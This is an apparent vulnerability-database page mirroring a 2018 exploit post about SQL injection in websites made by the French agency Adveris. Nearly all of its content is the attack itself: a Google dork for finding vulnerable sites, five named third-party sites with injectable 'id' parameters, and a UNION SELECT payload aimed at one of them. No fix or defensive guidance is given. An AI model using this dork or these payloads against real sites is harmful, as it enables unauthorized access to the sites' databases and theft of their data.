Création site internet Adveris SQL Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1214909 漏洞类型
发布时间 2018-07-07 更新时间 2018-07-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070070
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title :  Création site internet Adveris SQL Injection Vulnerability
# Date : 2018-07-03
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : www.adveris.fr
# Google Dork : "Création site internet : Adveris" inurl:.php?id=
# category : webapps
# Tested on : Win7 , Kali Linux


Proof of Concept : 

 search google Dork : "Création site internet : Adveris" inurl:.php?id=
Demo :
 
  http://www.covepro.fr/sous-categorie.php?id=6' [Sql injection Vulnerability]
  http://www.laurenceoldak.fr/actualite.php?id=5' [Sql injection Vulnerability]
  http://www.rcapackaging.fr/page.php?id=9' [Sql injection Vulnerability]
  http://www.securinfor.fr/actualite.php?id=62' [Sql injection Vulnerability]
  http://www.win-elearning.com/actualite.php?id=14' [Sql injection Vulnerability]

  http://www.covepro.fr/sous-categorie.php?id=-6+union+select+version()--

# Discovered by : Mr_null